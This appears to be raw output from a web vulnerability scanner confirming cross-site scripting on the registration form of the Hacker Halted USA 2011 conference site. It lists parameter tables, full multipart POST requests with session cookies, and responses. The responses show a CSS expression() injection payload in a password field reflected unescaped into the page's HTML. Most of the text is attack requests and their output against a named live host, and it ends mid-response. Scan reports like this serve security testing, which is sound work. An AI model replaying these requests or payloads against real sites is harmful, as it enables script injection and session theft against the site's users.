}.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=90e2661113f64a02accefb1637dfcaff
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=scamggbr37vkhil8ks9b9rsn65
Content-Length: 1550
Accept-Encoding: gzip, deflate

--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="action"

preload_category
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="eventid"

19301
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="categoryid"

-1
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="language"

eng
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="reference"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="eb"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="admin"

-1
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="bridgeid"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="discountcode"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="catpassword[65419]"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="catpassword[65420]"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="catpassword[65413]"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="catpassword[65411]"

" stYle="x:expre/**/ssion(netsparker(9))
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="catpassword[65421]"

3
--90e2661113f64a02accefb1637dfcaff
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--90e2661113f64a02accefb1637dfcaff--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:53:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=518500687c4b41beb364b403b1d3a1bc
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=scamggbr37vkhil8ks9b9rsn65
Content-Length: 1550
Accept-Encoding: gzip, deflate

--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="action"

preload_category
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="eventid"

19301
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="categoryid"

-1
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="language"

eng
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="reference"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="eb"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="admin"

-1
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="bridgeid"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="discountcode"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="catpassword[65419]"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="catpassword[65420]"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="catpassword[65413]"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="catpassword[65411]"

3
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="catpassword[65421]"

" stYle="x:expre/**/ssion(netsparker(9))
--518500687c4b41beb364b403b1d3a1bc
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--518500687c4b41beb364b403b1d3a1bc--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:53:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 